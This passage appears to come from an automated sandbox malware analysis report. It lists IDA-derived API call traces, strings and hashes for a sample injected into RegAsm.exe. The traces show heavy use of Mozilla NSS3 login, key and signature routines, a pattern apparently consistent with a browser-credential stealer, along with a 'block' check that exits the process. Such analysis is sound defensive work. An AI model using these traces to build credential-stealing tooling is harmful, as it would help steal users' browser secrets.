                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$CriticalSectionUnlock$Enter$Error$callocfree$Alloc_LeaveUtilrealloc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 759471828-0
                                                                                                                                                                                                                                                                  • Opcode ID: 127bff47b6411aa21f313674cc18e68b6857bd8ce125c1586ce99823c37b7cab
                                                                                                                                                                                                                                                                  • Instruction ID: bd971dbf662ea62ddd7b1819fec3713fa6feaa24e2efe5226666a21a08cb00c6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 127bff47b6411aa21f313674cc18e68b6857bd8ce125c1586ce99823c37b7cab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19B11275A002069FDF45EF28D844AAA77B8BF59318F848128ED0597B00E734E976CFE1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C925DEC
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE0B5,00000000,?,?,?,?,?,?,?,?), ref: 6C925E0F
                                                                                                                                                                                                                                                                  • PORT_ZAlloc_Util.NSS3(00000828), ref: 6C925E35
                                                                                                                                                                                                                                                                  • SECKEY_CopyPublicKey.NSS3(?), ref: 6C925E6A
                                                                                                                                                                                                                                                                  • HASH_GetHashTypeByOidTag.NSS3(00000000), ref: 6C925EC3
                                                                                                                                                                                                                                                                  • NSS_GetAlgorithmPolicy.NSS3(00000000,00000020), ref: 6C925ED9
                                                                                                                                                                                                                                                                  • SECKEY_SignatureLen.NSS3(?), ref: 6C925F09
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE0B5,00000000), ref: 6C925F49
                                                                                                                                                                                                                                                                  • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C925F89
                                                                                                                                                                                                                                                                  • free.MOZGLUE(?), ref: 6C925FA0
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C925FB6
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C925FBF
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C92600C
                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C926079
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C926084
                                                                                                                                                                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C926094
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Util$Item_Zfree$AlgorithmErrorPolicyPublicfreememcpy$Alloc_CopyDestroyHashSignatureType
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2310191401-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: d306a5882abbc13f3b1786d002266d4979e0065586a68341fdb10ce8f6e4393f
                                                                                                                                                                                                                                                                  • Instruction ID: 53d6cb7ae027171c6b400fa037b5a774d4734e79c8e2a540263cd9adbc6bd01b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d306a5882abbc13f3b1786d002266d4979e0065586a68341fdb10ce8f6e4393f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 658108B1E102059BDF10CE65CC84BAE77B9AF14318F144128E999E7B99E739EC18CBD1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_LoginUser), ref: 6C949C66
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C949C94
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C949CA3
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA2D963
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C949CB9
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6C949CDA
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C949CF5
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C949D10
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6C949D29
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6C949D42
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
• Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                  • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                                                                                                                                                                                                                                  • API String ID: 1003633598-3838449515
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • _EH_prolog.MSVCRT ref: 00411CC3
                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block,00000000,?,?,00416DD2), ref: 00411CE5
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00411CF0
                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411D07
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2170451919.0000000000435000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000439000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000043D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000052D000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000530000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000555000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000574000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.000000000060E000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000002.00000002.2170451919.0000000000640000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExitH_prologProcessstrtok_s
                                                                                                                                                                                                                                                                  • String ID: block
                                                                                                                                                                                                                                                                  • API String ID: 3745986650-2199623458
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,00000080), ref: 6CA29C70
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6CA29C85
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: calloc.MOZGLUE(00000001,00000084,6C900936,00000001,?,6C90102C), ref: 6C9D98E5
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000), ref: 6CA29C96
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C9021BC), ref: 6C8FBB8C
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6CA29CA9
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C9D9946
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8916B7,00000000), ref: 6C9D994E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: free.MOZGLUE(00000000), ref: 6C9D995E
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6CA29CB9
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3 ref: 6CA29CC9
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000), ref: 6CA29CDA
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C8FBBEB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C8FBBFB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: GetLastError.KERNEL32 ref: 6C8FBC03
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C8FBC19
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: free.MOZGLUE(00000000), ref: 6C8FBC22
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(?), ref: 6CA29CF0
                                                                                                                                                                                                                                                                  • PR_NewPollableEvent.NSS3 ref: 6CA29D03
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_CallOnce.NSS3(6CA714B0,6CA1F510), ref: 6CA1F3E6
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_CreateIOLayerStub.NSS3(6CA7006C), ref: 6CA1F402
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_Malloc.NSS3(00000004), ref: 6CA1F416
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CA1F42D
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_SetSocketOption.NSS3(?), ref: 6CA1F455
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA1F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CA1F473
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9890: TlsGetValue.KERNEL32(?,?,?,6C9D97EB), ref: 6C9D989E
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6CA29D78
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,0000000C), ref: 6CA29DAF
                                                                                                                                                                                                                                                                  • _PR_CreateThread.NSS3(00000000,6CA29EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CA29D9F
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FB3C0: TlsGetValue.KERNEL32 ref: 6C8FB403
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C8FB459
                                                                                                                                                                                                                                                                  • _PR_CreateThread.NSS3(00000000,6CA2A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CA29DE8
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,0000000C), ref: 6CA29DFC
                                                                                                                                                                                                                                                                  • _PR_CreateThread.NSS3(00000000,6CA2A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CA29E29
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,0000000C), ref: 6CA29E3D
                                                                                                                                                                                                                                                                  • _PR_MD_UNLOCK.NSS3(?), ref: 6CA29E71
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA29E89
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
• Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4254102231-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6C944CF3
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C944D28
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C944D37
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA2D963
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C944D4D
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C944D7B
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C944D8A
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C944DA0
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6C944DBC
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6C944E20
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
• Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                  • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                                                                                                                                                  • API String ID: 1003633598-3553622718
                                                                                                                                                                                                                                                                  • Opcode ID: 33d1d282a6a95845c735852a862225ba4dfde9a6ca9d97a00f40c22731632ed2
                                                                                                                                                                                                                                                                  • Instruction ID: d0935fd9075bc273e48586b1dc639568d4fa85f0686aea87d9e9a818686a3aa3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 33d1d282a6a95845c735852a862225ba4dfde9a6ca9d97a00f40c22731632ed2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8141D375600225EFD7059F50DD88FAA77B9BB5231DF08C125E409ABA12DB34D889CBB1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(C_Verify), ref: 6C947CB6
                                                                                                                                                                                                                                                                  • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C947CE4
                                                                                                                                                                                                                                                                  • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C947CF3
                                                                                                                                                                                                                                                                    • Part of subcall function 6CA2D930: PL_strncpyz.NSS3(?,?,?), ref: 6CA2D963
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3(?,00000000), ref: 6C947D09
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C947D2A
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C947D45
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C947D5E
                                                                                                                                                                                                                                                                  • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6C947D77
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
• Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                  • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                                                                                                                                                                                                                                  • API String ID: 1003633598-3278097884
                                                                                                                                                                                                                                                                  • Opcode ID: baf78553c84d200ee93a02c79b3e8a1144e35b3c433fae9a01165d70dfb585b1
                                                                                                                                                                                                                                                                  • Instruction ID: 31ffc6c4d6937839d9ab599264b770f34aaafa5e8f7e627d5ba1a7c8537955e9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: baf78553c84d200ee93a02c79b3e8a1144e35b3c433fae9a01165d70dfb585b1
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8531E539601269EFDB059F54DD48F9A7BB2BB52318F08C024E40997612DB30D89ACBB1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CA213BC,?,?,?,6CA21193), ref: 6CA21C6B
                                                                                                                                                                                                                                                                  • PR_NewLock.NSS3(?,6CA21193), ref: 6CA21C7E
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D98D0: calloc.MOZGLUE(00000001,00000084,6C900936,00000001,?,6C90102C), ref: 6C9D98E5
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000,?,6CA21193), ref: 6CA21C91
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C9021BC), ref: 6C8FBB8C
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000,?,?,6CA21193), ref: 6CA21CA7
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C8FBBEB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C8FBBFB
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: GetLastError.KERNEL32 ref: 6C8FBC03
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C8FBC19
                                                                                                                                                                                                                                                                    • Part of subcall function 6C8FBB80: free.MOZGLUE(00000000), ref: 6C8FBC22
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000,?,?,?,6CA21193), ref: 6CA21CBE
                                                                                                                                                                                                                                                                  • PR_NewCondVar.NSS3(00000000,?,?,?,?,6CA21193), ref: 6CA21CD4
                                                                                                                                                                                                                                                                  • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CA21193), ref: 6CA21CFE
                                                                                                                                                                                                                                                                  • PR_Lock.NSS3(?,?,?,?,?,?,?,6CA21193), ref: 6CA21D1A
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C901A48), ref: 6C9D9BB3
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9D9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C901A48), ref: 6C9D9BC8
                                                                                                                                                                                                                                                                  • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CA21193), ref: 6CA21D3D
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                                                                                                                                    • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE890,00000000,?,6CA21193), ref: 6CA21D4E
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CA21193), ref: 6CA21D64
                                                                                                                                                                                                                                                                  • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CA21193), ref: 6CA21D6F
                                                                                                                                                                                                                                                                  • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CA21193), ref: 6CA21D7B
                                                                                                                                                                                                                                                                  • PR_DestroyCondVar.NSS3(?,?,?,?,?,6CA21193), ref: 6CA21D87
                                                                                                                                                                                                                                                                  • PR_DestroyCondVar.NSS3(00000000,?,?,?,6CA21193), ref: 6CA21D93
                                                                                                                                                                                                                                                                  • PR_DestroyLock.NSS3(00000000,?,?,6CA21193), ref: 6CA21D9F
                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,6CA21193), ref: 6CA21DA8
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2178045493.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
• Associated: 00000002.00000002.2178030697.000000006C890000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178601376.000000006CA6E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178623210.000000006CA6F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178643936.000000006CA70000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.2178660205.000000006CA75000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6c890000_RegAsm.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3246495057-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C975EC0,00000000,?,?), ref: 6C975CBE
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C975CD7
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C975CF0
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C975D09
                                                                                                                                                                                                                                                                  • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C975EC0,00000000,?,?), ref: 6C975D1F
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C975D3C
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C975D51
                                                                                                                                                                                                                                                                  • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C975D66
                                                                                                                                                                                                                                                                  • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C975D80
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                                                                  • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                                                                  • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CA41DE0,?), ref: 6C976CFE
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C976D26
                                                                                                                                                                                                                                                                  • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C976D70
                                                                                                                                                                                                                                                                  • PORT_Alloc_Util.NSS3(00000480), ref: 6C976D82
                                                                                                                                                                                                                                                                  • DER_GetInteger_Util.NSS3(?), ref: 6C976DA2
                                                                                                                                                                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C976DD8
                                                                                                                                                                                                                                                                  • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C976E60
                                                                                                                                                                                                                                                                  • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C976F19
                                                                                                                                                                                                                                                                  • PK11_DigestBegin.NSS3(00000000), ref: 6C976F2D
